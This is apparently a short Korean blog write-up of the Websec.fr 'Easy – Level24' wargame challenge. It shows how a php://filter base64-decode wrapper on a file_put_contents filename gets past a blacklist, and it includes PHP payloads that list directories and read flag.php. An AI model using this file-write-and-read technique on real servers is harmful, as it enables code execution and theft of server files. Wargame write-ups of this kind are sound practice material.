Notice
Recent Posts
Recent Comments
Link
일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | 5 | 6 | 7 |
8 | 9 | 10 | 11 | 12 | 13 | 14 |
15 | 16 | 17 | 18 | 19 | 20 | 21 |
22 | 23 | 24 | 25 | 26 | 27 | 28 |
29 | 30 |
Tags
- windows
- PetitPotam
- ATT&CK
- 프론트엔드개발자
- wargame
- Credential Access
- forensic
- rce
- filesystem
- 가이드라인
- AD
- 백엔드개발자
- exploit
- elasticsearch
- #C언어 #연산자
- elk stack
- software
- error 583066
- 정보보안
- SQLMap
- #whitespace #
- Mitre
- 시스템해킹
- 랜섬웨어
- 침해사고
- Index
- pwnable
- node.js
- sql인젝션
- Threat Intelligence
Archives
- Today
- Total
Plit00's Story
[Websec.fr] Easy - Level24 본문
PHP 필터 취약점.
블랙리스트를 우회하기 위해 file_put_contents에 필터를 사용할 수 있습니다.
filename을 php : //filter/convert.base64-decode/resource=xxxx.php로 설정하고 데이터를 base64 인코딩 페이로드로 설정하고
우리는 다양한 PHP 페이로드를 시도하고 액세스합니다
<?php
echo var_dump (scandir ( '../ ..'));
?>
디렉토리의 내용을 나열하며 flag.php를 볼 수 있습니다.
<?php
echo file_get_contents ( '../../ flag.php'));?
>
'Wargame > websec.fr' 카테고리의 다른 글
[Websec.fr] medium - Level12 (0) | 2019.08.16 |
---|---|
[Websec.fr] Hard - Level14 (0) | 2019.08.16 |
[Websec.fr] Hard - level23 (0) | 2019.04.12 |
[Websec.fr] medium - level3 (0) | 2019.04.08 |
[Websec.fr] medium - Level5 (0) | 2019.04.08 |
Comments